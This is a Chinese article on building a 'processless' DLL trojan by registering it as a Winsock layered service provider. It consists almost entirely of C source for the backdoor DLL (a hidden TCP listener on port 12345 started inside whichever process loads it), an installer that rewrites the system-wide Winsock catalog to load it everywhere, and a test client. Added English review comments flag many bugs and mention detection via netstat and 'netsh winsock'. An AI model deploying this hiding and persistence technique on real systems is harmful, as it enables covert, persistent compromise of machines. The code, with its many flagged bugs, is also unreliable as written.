
无进程DLL木马的又一开发思路与实现


在 Microsoft 的 32 位 Windows 操作系统中,有许多办法可以实现进程隐藏;本文介绍的一种是把代码放进 Winsock 分层服务提供者(LSP)DLL,由系统中已有的进程在创建 TCP 套接字时加载,因而不会出现独立的木马进程。

作者:巧巧读书 来源:巧巧读书 2008年9月2日

关键字: 进程 系统进程 进程管理



  六)附录之源代码

  1.backdoor源代码

  /* "Shared" data segment: one copy of dllcount for every process that maps
     this DLL (made read/write/shared by the linker directive below).  DllMain
     uses it so that only the first process to load the provider starts the
     listener thread.
     NOTE(review): the mutex that guards dllcount in DllMain is unnamed and
     therefore per-process, so two processes loading the DLL at the same time
     are not serialised against each other -- only a named mutex would do that. */
  #pragma data_seg("Shared")
  int   dllcount=0;
  #pragma data_seg()
  /* Section attributes: readable, writable, shared between processes. */
  #pragma comment (linker,"/section:Shared,rws")

  #define UNICODE

  #define _UNICODE

  #include <ws2spi.h>

  #include <tchar.h>

  #include <winsock2.h> 

  /* GUID under which the installer (instBD) registers this DLL as a layered
     service provider; WSPStartup looks this DLL up in the catalog by it. */
  GUID filterguid={0xc5fabbd0,0x9736,0x11d1,{0x93,0x7f,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
  /* Snapshot of the Winsock provider catalog, filled by getfilter() and
     released by freefilter(). */
  LPWSAPROTOCOL_INFOW protoinfo=NULL;
  /* Proc table of the next provider in the chain, captured in WSPStartup.
     NOTE(review): it is stored but never read anywhere in this listing --
     no Winsock call is hooked; the DLL is a pass-through provider and the
     listener is started from DllMain instead. */
  WSPPROC_TABLE    nextproctable;
  DWORD        protoinfosize=0;
  /* Per-process mutex created in DllMain (never closed). */
  HANDLE        hmutex; 
  /* Listener thread handle; only meaningful in the process that created it. */
  HANDLE        hthread;
  POINT        nowpt;   /* not used in this listing */
  int         totalprotos=0;

  /* Listener thread, started by DllMain in the first process that loads the
     DLL.  Binds TCP port 12345 on every interface, accepts one client at a
     time and answers the fixed string "i am TOo2y" with
     "i am waiting for you !"; any other input is dropped.  Nothing is
     executed on behalf of the peer -- this is a reachability beacon, not a
     shell.  The fixed, unauthenticated port inside a process that has no
     reason to serve TCP is the observable artefact (e.g. the owning PID in
     netstat -ano).
     Param: thread argument, unused.
     Returns 0 if socket setup fails; the accept loop never exits. */
  DWORD WINAPI backdoor(LPVOID) 
  {
  SOCKET  sock,sockt;
  WSADATA wsa;
  int   iret=0;
  char   msg[25];
  struct  sockaddr_in sin;
  if(WSAStartup(MAKEWORD(2,2),&wsa))
  {
  OutputDebugString(_T("WSAStartup Error!"));
  return 0;
  }
  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
  {
  OutputDebugString(_T("Socket Error!"));
  return 0;
  }
  /* NOTE(review): INADDR_ANY is 0, so htons() happens to be harmless here,
     but s_addr is a 32-bit field and htonl() is the matching conversion. */
  sin.sin_addr.s_addr=htons(INADDR_ANY);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(12345);
  /* NOTE(review): on the failure paths below sock is never closed and
     WSACleanup() is never called; the thread simply ends.  bind() also fails
     whenever another process already holds port 12345. */
  if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==SOCKET_ERROR)
  {
  OutputDebugString(_T("Bind Error!"));
  return 0;
  }
  if(listen(sock,5)==SOCKET_ERROR)
  {
  OutputDebugString(_T("Listen Error!"));
  return 0;
  }
  while(1)
  {
  if((sockt=accept(sock,NULL,NULL))==SOCKET_ERROR)
  {
  OutputDebugString(_T("Accept Error!"));
  continue;
  }
  /* NOTE(review): "iret==recv(...)" is a comparison, not an assignment; the
     expression is 0 or 1 and can never equal SOCKET_ERROR, so a failed
     recv() is not detected and msg is then searched uninitialised.  msg is
     also not NUL-terminated when recv() fills all 25 bytes, so strstr()
     can read past the end of the buffer.  The same typo is on send() below. */
  if((iret==recv(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
  {
  OutputDebugString(_T("Recv Error!"));
  closesocket(sockt);
  continue; 
  }
  if(strstr(msg,"i am TOo2y"))
  {
  memset(msg,0,sizeof(msg));
  /* NOTE(review): copies 24 bytes out of a 23-byte literal (22 chars + NUL),
     i.e. one byte past the end of the string constant; 22 or sizeof the
     literal would be the correct length.  All 25 bytes are then sent. */
  memcpy(msg,"i am waiting for you !",sizeof(msg)-1);
  if((iret==send(sockt,msg,sizeof(msg),0))==SOCKET_ERROR)
  {
  OutputDebugString(_T("Send Error!"));
  closesocket(sockt);
  continue;
  }
  }
  /* Logged for every accepted connection, matched or not. */
  OutputDebugString(_T("Transport Successfully"));
  closesocket(sockt);
  }
  return 1;   /* unreachable: the loop above never terminates */
  }

  /* Take a snapshot of the Winsock provider catalog into protoinfo.
     Two-step WSCEnumProtocols(): the first call with a NULL buffer fails with
     WSAENOBUFS and reports the size needed in protoinfosize, the second call
     fills the allocated buffer.  On success totalprotos holds the number of
     catalog entries and protoinfo must later be released with freefilter().
     Returns TRUE on success, FALSE on any error.
     NOTE(review): if the second enumeration fails, protoinfo stays allocated
     and totalprotos holds SOCKET_ERROR (-1); the caller in this listing
     (WSPStartup) ignores the return value and loops over totalprotos anyway. */
  BOOL getfilter()
  {
  int  errorcode;
  protoinfo=NULL;
  protoinfosize=0;
  totalprotos=0;
  if(WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode)==SOCKET_ERROR)
  {
  /* WSAENOBUFS is the expected "tell me the size" outcome. */
  if(errorcode!=WSAENOBUFS)
  {
  OutputDebugString(_T("First WSCEnumProtocols Error!"));
  return FALSE;
  }
  }
  if((protoinfo=(LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR,protoinfosize))==NULL)
  {
  OutputDebugString(_T("GlobalAlloc Error!")); 
  return FALSE;
  }
  if((totalprotos=WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode))==SOCKET_ERROR)
  {
  OutputDebugString(_T("Second WSCEnumProtocols Error!")); 
  return FALSE;
  }
  return TRUE;
  }

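  /* Release the catalog snapshot taken by getfilter().
     The global pointer is cleared afterwards so that a repeated call, or a
     call on the error path before the next getfilter(), cannot free the same
     block twice. */
  void freefilter()
  {
    GlobalFree(protoinfo);
    protoinfo=NULL;
  }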

  /* DLL entry point.  Because the DLL is registered as a Winsock layered
     provider, any process that creates a TCP socket through the reordered
     catalog loads it; the shared dllcount decides which of those processes
     hosts the listener (the one that raises the count from 0 to 1).  That is
     what makes the listener "process-less": it runs inside an arbitrary host
     process instead of a process of its own.
     NOTE(review): CreateMutex()/CreateThread() from DllMain are exactly the
     calls the DllMain documentation warns against (loader lock); the
     technique depends on them nevertheless.
     Params: hmodule, reason, lpreserved as for any DllMain.  Always returns TRUE. */
  BOOL WINAPI DllMain(HINSTANCE hmodule,
  DWORD   reason,
  LPVOID  lpreserved)
  {
  TCHAR  processname[MAX_PATH];
  /* MAX_PATH chars of path + " Loading my dll ..." (19) + NUL fit in MAX_PATH+25. */
  TCHAR  showmessage[MAX_PATH+25];
  switch(reason)
  {
  case DLL_PROCESS_ATTACH:
  {
  /* Debug trace of the host process path (visible with a debugger / DebugView). */
  GetModuleFileName(NULL,processname,MAX_PATH);
  _tcscpy(showmessage,processname);
  _tcscat(showmessage,_T(" Loading my dll ..."));
  OutputDebugString(showmessage); 
  /* NOTE(review): an unnamed mutex is private to this process, so it does not
     serialise updates to the cross-process dllcount; the handle is never
     closed either. */
  hmutex=CreateMutex(NULL,FALSE,NULL);
  WaitForSingleObject(hmutex,INFINITE);
  dllcount++;
  if(dllcount==1)
  {
  /* First loader: this process becomes the host of the listener thread. */
  OutputDebugString(_T("Start the backdoor ..."));
  hthread=CreateThread(NULL,0,backdoor,NULL,0,NULL); 
  }
  ReleaseMutex(hmutex);
  break;
  }
  case DLL_PROCESS_DETACH:
  {
  WaitForSingleObject(hmutex,INFINITE);
  dllcount--;
  if(dllcount==0)
  {
  CloseHandle(hthread);
  }
  ReleaseMutex(hmutex);
  /* NOTE(review): this is a second CloseHandle() on the same handle when the
     count reached zero above, and a CloseHandle() on an uninitialised hthread
     in every process that never started the thread.  Closing the handle does
     not stop the thread: it keeps running while the DLL is being unmapped. */
  CloseHandle(hthread);
  break;
  }
  }
  return TRUE;
  }

  /* SPI entry point called by ws2_32 when a socket is created over the
     "TCP FILTER" chain.  Finds this provider's own catalog entry, takes the
     next entry of the chain, loads that provider's DLL and forwards the call
     to its WSPStartup so the caller receives the real provider's proc table.
     Nothing is hooked: the listener is started from DllMain, this function
     only keeps the protocol chain functional.
     Params: the standard WSPStartup arguments; lpproctable is filled by the
     next provider.  Returns 0 on success or a Winsock error code. */
  int WSPAPI WSPStartup(
  WORD  wversionrequested,
  LPWSPDATA  lpwspdata,
  LPWSAPROTOCOL_INFOW     lpprotoinfo,
  WSPUPCALLTABLE upcalltable,
  LPWSPPROC_TABLE lpproctable)
  {
  int      i;
  int      errorcode;
  int      filterpathlen;
  DWORD     layerid=0;
  DWORD     nextlayerid=0;
  TCHAR     *filterpath;
  HINSTANCE   hfilter;
  LPWSPSTARTUP wspstartupfunc=NULL;
  /* A chain of length 1 would be a base provider, which this DLL is not. */
  if(lpprotoinfo->ProtocolChain.ChainLen<=1)
  {
  OutputDebugString(_T("ChainLen<=1"));  
  /* NOTE(review): FALSE is 0, which the caller reads as success with
     lpproctable left unfilled; WSAEPROVIDERFAILEDINIT (used below) is the
     failure code the SPI expects here. */
  return FALSE;
  }
  /* NOTE(review): return value ignored; on failure protoinfo is NULL and
     totalprotos may be SOCKET_ERROR. */
  getfilter();
  /* Locate our own catalog entry id by provider GUID. */
  for(i=0;i<totalprotos;i++)
  {
  if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0)
  {
  layerid=protoinfo[i].dwCatalogEntryId;
  break;
  }
  }
  /* The entry after ours in the chain is the provider to forward to.
     NOTE(review): ChainEntries[i+1] is read without checking i+1<ChainLen,
     and if our entry was not found layerid is 0 and the loop compares
     against 0. */
  for(i=0;i<lpprotoinfo->ProtocolChain.ChainLen;i++)
  {
  if(lpprotoinfo->ProtocolChain.ChainEntries[i]==layerid)
  {
  nextlayerid=lpprotoinfo->ProtocolChain.ChainEntries[i+1];
  break;
  }
  }
  /* NOTE(review): filterpathlen is handed to WSCGetProviderPath() and
     ExpandEnvironmentStrings() as a character count, but the buffer is
     filterpathlen *bytes*; with UNICODE defined (TCHAR == WCHAR) that is
     half the advertised size, so a long provider path can overrun it.
     Neither the buffer nor hfilter is ever released. */
  filterpathlen=MAX_PATH;
  filterpath=(TCHAR*)GlobalAlloc(GPTR,filterpathlen); 
  for(i=0;i<totalprotos;i++)
  {
  if(nextlayerid==protoinfo[i].dwCatalogEntryId)
  {
  if(WSCGetProviderPath(&protoinfo[i].ProviderId,filterpath,&filterpathlen,&errorcode)==SOCKET_ERROR)
  {
  OutputDebugString(_T("WSCGetProviderPath Error!"));
  return WSAEPROVIDERFAILEDINIT;
  }
  break;
  }
  }
  /* Catalog paths may contain %SystemRoot%-style variables; expanded in
     place.  NOTE(review): source and destination are the same buffer --
     confirm that the API permits overlapping buffers. */
  if(!ExpandEnvironmentStrings(filterpath,filterpath,MAX_PATH))
  {
  OutputDebugString(_T("ExpandEnvironmentStrings Error!")); 
  return WSAEPROVIDERFAILEDINIT;
  }
  if((hfilter=LoadLibrary(filterpath))==NULL)
  {
  OutputDebugString(_T("LoadLibrary Error!"));
  return WSAEPROVIDERFAILEDINIT;
  }
  if((wspstartupfunc=(LPWSPSTARTUP)GetProcAddress(hfilter,"WSPStartup"))==NULL)
  {
  OutputDebugString(_T("GetProcessAddress Error!"));
  return WSAEPROVIDERFAILEDINIT;
  }
  /* Hand the real call to the next provider; its proc table is what the
     caller gets. */
  if((errorcode=wspstartupfunc(wversionrequested,lpwspdata,lpprotoinfo,upcalltable,lpproctable))!=ERROR_SUCCESS)
  {
  OutputDebugString(_T("wspstartupfunc Error!"));
  return errorcode;
  }
  /* Saved for hooking but not referenced anywhere else in this listing. */
  nextproctable=*lpproctable;
  freefilter();
  return 0;
  }

  #define UNICODE

  #define _UNICODE

  #include <stdio.h>

  #include <tchar.h>

  #include <string.h>

  #include <ws2spi.h>

  #include <sporder.h>

  /* ---- Second listing: instBD, the installer / uninstaller.  The page
     omits its "2." heading; the banner printed by start() identifies it. ---- */
  /* GUID of the layered provider entry.  Must match the GUID compiled into
     backdoor.dll so that its WSPStartup can find itself in the catalog. */
  GUID filterguid={0xc5fabbd0,0x9736,0x11d1,{0x93,0x7f,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
  /* GUID of the protocol-chain entry ("TCP FILTER") layered over TCP. */
  GUID filterchainguid={0xf9065320,0x9e90,0x11d1,{0x93,0x81,0x00,0xc0,0x4f,0xad,0x86,0x0d}};
  BOOL getfilter();
  void freefilter();
  void installfilter();
  void removefilter();
  void start();
  void usage();
  /* Catalog snapshot shared by the functions below (see getfilter/freefilter). */
  int          totalprotos=0;
  DWORD         protoinfosize=0;
  LPWSAPROTOCOL_INFOW  protoinfo=NULL;

  /* Command-line entry point: prints the banner, then runs the install or
     remove action selected by the single argument, or the usage text when
     the arguments do not match either form.  Always exits with 0. */
  int main(int argc,char *argv[])
  {
    start();
    if(argc!=2)
    {
      usage();
      return 0;
    }
    if(!strcmp(argv[1],"-install"))
    {
      installfilter();
    }
    else if(!strcmp(argv[1],"-remove"))
    {
      removefilter();
    }
    else
    {
      usage();
    }
    return 0;
  }

  /* Take a snapshot of the Winsock provider catalog into protoinfo (same
     two-step WSCEnumProtocols() pattern as in the DLL: size query that fails
     with WSAENOBUFS, then the real enumeration).  Sets totalprotos and
     prints the entry count.  Returns TRUE on success, FALSE on error; the
     buffer is released with freefilter().
     NOTE(review): the second-call error message prints GetLastError() while
     the Winsock error is in errorcode; on that path protoinfo stays allocated
     and totalprotos is SOCKET_ERROR.  installfilter() ignores the return value. */
  BOOL getfilter()
  {
  int errorcode;
  protoinfo=NULL;
  totalprotos=0;
  protoinfosize=0;
  if(WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode)==SOCKET_ERROR)
  {
  if(errorcode!=WSAENOBUFS)
  {
  printf("First WSCEnumProtocols Error: %d\n",errorcode);
  return FALSE;
  }
  }
  if((protoinfo=(LPWSAPROTOCOL_INFOW)GlobalAlloc(GPTR,protoinfosize))==NULL)
  {
  printf("GlobalAlloc in getfilter Error: %d\n",GetLastError());
  return FALSE;
  }
  if((totalprotos=WSCEnumProtocols(NULL,protoinfo,&protoinfosize,&errorcode))==SOCKET_ERROR)
  {
  printf("Second WSCEnumProtocols Error: %d\n",GetLastError());
  return FALSE;
  }
  printf("Found %d protocols!\n",totalprotos);
  return TRUE;
  }

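  /* Release the catalog snapshot taken by getfilter().
     installfilter() calls this several times between re-enumerations; the
     pointer is cleared so a repeated call, or a call on an error path, can
     never free the same block twice. */
  void freefilter()
  {
    GlobalFree(protoinfo);
    protoinfo=NULL;
  }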

  /* Register backdoor.dll in the Winsock catalog in three steps:
       1. install it as a layered provider ("IP FILTER") cloned from the first
          AF_INET/IPPROTO_IP entry;
       2. install a protocol chain ("TCP FILTER") cloned from the first
          AF_INET/IPPROTO_TCP entry with the new layer inserted on top;
       3. rewrite the catalog order so both new entries come first, which is
          what makes a plain TCP socket go through the chain.
     The DLL path is <current directory>\backdoor.dll as seen at install time.
     WSCInstallProvider() modifies the machine-wide catalog, so this needs
     administrative rights.  For a defender the catalog change is the
     persistence mechanism: `netsh winsock show catalog` lists it and
     `netsh winsock reset` removes it.  Prints an error and returns on the
     first failing step; partially applied steps are not rolled back. */
  void installfilter()
  {
  int        i;
  int        provcnt;
  int        cataindex;
  int        errorcode;
  BOOL        rawip=FALSE;
  BOOL        tcpip=FALSE;
  DWORD       iplayercataid=0,tcporigcataid;
  TCHAR       filter_path[MAX_PATH];      
  TCHAR       filter_name[MAX_PATH];
  TCHAR       chainname[WSAPROTOCOL_LEN+1];   
  LPDWORD      cataentries;
  WSAPROTOCOL_INFOW iplayerinfo,tcpchaininfo,chainarray[1];
  /* NOTE(review): return value ignored (see getfilter). */
  getfilter();
  /* Pick templates: the first raw-IP entry for the layer, the first TCP entry
     for the chain.  XP1_IFS_HANDLES is cleared because a layered provider
     does not hand out IFS handles. */
  for(i=0;i<totalprotos;i++)
  {
  if(!rawip
  && protoinfo[i].iAddressFamily==AF_INET
  && protoinfo[i].iProtocol==IPPROTO_IP)
  {
  rawip=TRUE;
  memcpy(&iplayerinfo,&protoinfo[i],sizeof(WSAPROTOCOL_INFOW));
  iplayerinfo.dwServiceFlags1=protoinfo[i].dwServiceFlags1 &(~XP1_IFS_HANDLES);
  }
  if(!tcpip
  && protoinfo[i].iAddressFamily==AF_INET
  && protoinfo[i].iProtocol==IPPROTO_TCP) 
  {
  tcpip=TRUE;
  tcporigcataid=protoinfo[i].dwCatalogEntryId;
  memcpy(&tcpchaininfo,&protoinfo[i],sizeof(WSAPROTOCOL_INFOW));
  tcpchaininfo.dwServiceFlags1=protoinfo[i].dwServiceFlags1 &(~XP1_IFS_HANDLES);
  }
  }
  /* NOTE(review): iplayerinfo is used even when no raw-IP entry was found
     (rawip stays FALSE), i.e. an uninitialised struct is installed. */
  _tcscpy(iplayerinfo.szProtocol,_TEXT("IP FILTER"));
  iplayerinfo.ProtocolChain.ChainLen=LAYERED_PROTOCOL;
  if(GetCurrentDirectory(MAX_PATH,filter_path)==0)
  {
  printf("GetCurrentDirectory Error: %d\n",GetLastError());
  return ;
  }
  /* NOTE(review): unbounded _tcscat -- a current directory close to MAX_PATH
     plus "\backdoor.dll" (13 chars) overruns filter_path. */
  _tcscpy(filter_name,_TEXT("\\backdoor.dll"));
  _tcscat(filter_path,filter_name);
  /* Step 1: the layered provider entry. */
  if(WSCInstallProvider(&filterguid,filter_path,&iplayerinfo,1,&errorcode)==SOCKET_ERROR)
  {
  printf("WSCInstallProvider Error: %d\n",errorcode);
  return ;
  }
  /* Re-enumerate to learn the catalog id the system assigned to it. */
  freefilter();
  getfilter();
  for(i=0;i<totalprotos;i++)
  {
  if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0)
  {
  iplayercataid=protoinfo[i].dwCatalogEntryId;
  break;
  }
  }
  provcnt=0;
  if(tcpip)
  {
  swprintf(chainname,_TEXT("TCP FILTER"));
  _tcscpy(tcpchaininfo.szProtocol,chainname);
  if(tcpchaininfo.ProtocolChain.ChainLen==BASE_PROTOCOL)
  {
  /* Base provider: chain becomes {our layer, original TCP entry}. */
  tcpchaininfo.ProtocolChain.ChainEntries[1]=tcporigcataid;
  }
  else
  {
  /* Existing chain: shift entries up by one to make room at index 0.
     NOTE(review): this loop copies ChainEntries[i] to [i+1] for
     i = ChainLen..1, so entry 0 is never moved to 1 before it is overwritten
     below and index ChainLen (one past the valid entries) is copied; the
     shift presumably intended is ChainEntries[i]=ChainEntries[i-1] for
     i = ChainLen..1.  There is also no check against MAX_PROTOCOL_CHAIN
     before ChainLen++. */
  for(i=tcpchaininfo.ProtocolChain.ChainLen;i>0;i--)
  {
  tcpchaininfo.ProtocolChain.ChainEntries[i+1]=tcpchaininfo.ProtocolChain.ChainEntries[i];
  }
  }
  tcpchaininfo.ProtocolChain.ChainLen++;
  tcpchaininfo.ProtocolChain.ChainEntries[0]=iplayercataid;
  memcpy(&chainarray[provcnt++],&tcpchaininfo,sizeof(WSAPROTOCOL_INFOW));
  }
  /* Step 2: the chain entry.
     NOTE(review): called even when no TCP entry was found (provcnt == 0). */
  if(WSCInstallProvider(&filterchainguid,filter_path,chainarray,provcnt,&errorcode)==SOCKET_ERROR)
  {
  printf("WSCInstallProvider for chain Error: %d\n",errorcode);
  return ;
  }
  /* Step 3: new catalog order -- our two entries first, everything else after. */
  freefilter();
  getfilter();
  /* NOTE(review): the order array holds DWORDs; sizing it with
     sizeof(WSAPROTOCOL_INFOW) over-allocates (harmless), and the error message
     prints errorcode instead of GetLastError(). */
  if((cataentries=(LPDWORD)GlobalAlloc(GPTR,totalprotos*sizeof(WSAPROTOCOL_INFOW)))==NULL)
  {
  printf("GlobalAlloc int installfilter Error: %d\n",errorcode);
  return ;
  }
  cataindex=0;
  for(i=0;i<totalprotos;i++)
  {
  if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))==0
  || memcmp(&protoinfo[i].ProviderId,&filterchainguid,sizeof(GUID))==0)
  {
  cataentries[cataindex++]=protoinfo[i].dwCatalogEntryId;
  }
  }
  for(i=0;i<totalprotos;i++)
  {
  if(memcmp(&protoinfo[i].ProviderId,&filterguid,sizeof(GUID))!=0
  && memcmp(&protoinfo[i].ProviderId,&filterchainguid,sizeof(GUID))!=0)
  {
  cataentries[cataindex++]=protoinfo[i].dwCatalogEntryId;
  }
  }
  /* NOTE(review): "errorcode==WSCWriteProviderOrder(...)" is a comparison, so
     the value tested against ERROR_SUCCESS is 0 or 1 and unrelated to the
     real result; success/failure reporting here is unreliable.  Intended:
     if((errorcode=WSCWriteProviderOrder(cataentries,totalprotos))!=ERROR_SUCCESS).
     cataentries is never freed on any path. */
  if((errorcode==WSCWriteProviderOrder(cataentries,totalprotos))!=ERROR_SUCCESS)
  {
  printf("WSCWriteProviderOrder Error: %d\n",GetLastError());
  return ;
  }
  freefilter();
  }

  /* Unregister both catalog entries added by installfilter(): the layered
     provider (filterguid) and the "TCP FILTER" chain (filterchainguid).
     A failure is reported and the other removal is still attempted. */
  void removefilter()
  {
    int errorcode=0;
    int layer_rc;
    int chain_rc;
    layer_rc=WSCDeinstallProvider(&filterguid,&errorcode);
    if(layer_rc==SOCKET_ERROR)
    {
      printf("WSCDeinstall filterguid Error: %d\n",errorcode);
    }
    chain_rc=WSCDeinstallProvider(&filterchainguid,&errorcode);
    if(chain_rc==SOCKET_ERROR)
    {
      printf("WSCDeinstall filterchainguid Error: %d\n",errorcode);
    }
  }

  /* Print the tool banner (name, author contact, date) before any action.
     The text is emitted as one block; it contains no conversion
     specifiers, so the output is the same as the separate printf() calls. */
  void start()
  {
    static const char banner[]=
      "Install BackDoor, by TOo2y\n"
      "E-mail: TOo2y@safechina.net\n"
      "Homepage: www.safechina.net\n"
      "Date: 11-3-2002\n\n";
    fputs(banner,stdout);
  }

  /* Print the one-line command syntax accepted by main(). */
  void usage()
  {
    fputs("instBD [ -install | -remove]\n",stdout);
  }

  3.testBD源代码

  #include <winsock2.h>

  #include <stdio.h>

  #include <conio.h>

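  /* Minimal test client: connects to the listener on 127.0.0.1:12345, sends
     the 25-byte buffer holding the magic string and prints the reply.
     Returns 0 on success and -1 on any Winsock failure; in every case it
     waits for a key press first so the console window stays open.
     Changes from the original: the reply is received into a buffer with one
     spare byte, NUL-terminated and printed through "%s" instead of being
     used as the printf() format string (the peer could otherwise inject
     conversion specifiers); the socket and Winsock state are released on
     every exit path. */
  int main()
  {
    WSADATA wsa;
    SOCKET  sock;
    struct  sockaddr_in sin;
    char   msg[25]="i am TOo2y";   /* the whole buffer goes on the wire, NUL padding included */
    char   reply[26];              /* one byte more than recv() may fill */
    int   iret;
    int   rc=-1;
    printf("===[ Test for SPI BackDoor ]===\n");
    printf("===[ TOo2y at 11-3-2002 ]===\n\n");
    if(WSAStartup(MAKEWORD(2,2),&wsa))
    {
      printf("WSAStartup Error: %d\n",WSAGetLastError());
      getche();
      return -1;
    }
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
      printf("Socket Error: %d\n",WSAGetLastError());
      goto cleanup_wsa;
    }
    memset(&sin,0,sizeof(sin));
    sin.sin_addr.s_addr=inet_addr("127.0.0.1");
    sin.sin_family=AF_INET;
    sin.sin_port=htons(12345);
    if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==SOCKET_ERROR)
    {
      printf("Connect Error: %d\n",WSAGetLastError());
      goto cleanup_sock;
    }
    /* The listener matches the magic string with strstr(), so the NUL
       padding after it is harmless and sizeof(msg) bytes are sent. */
    if((iret=send(sock,msg,sizeof(msg),0))==SOCKET_ERROR)
    {
      printf("Send Error: %d\n",WSAGetLastError());
      goto cleanup_sock;
    }
    memset(reply,0,sizeof(reply));
    /* Read at most sizeof(reply)-1 bytes so a terminator always fits. */
    if((iret=recv(sock,reply,sizeof(reply)-1,0))==SOCKET_ERROR)
    {
      printf("Recv Error: %d\n",WSAGetLastError());
      goto cleanup_sock;
    }
    reply[iret]=0;   /* iret is 0..sizeof(reply)-1 here */
    printf("Re: ");
    printf("%s",reply);   /* never pass peer-supplied data as the format string */
    rc=0;
  cleanup_sock:
    closesocket(sock);
  cleanup_wsa:
    WSACleanup();
    getche();
    return rc;
  }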
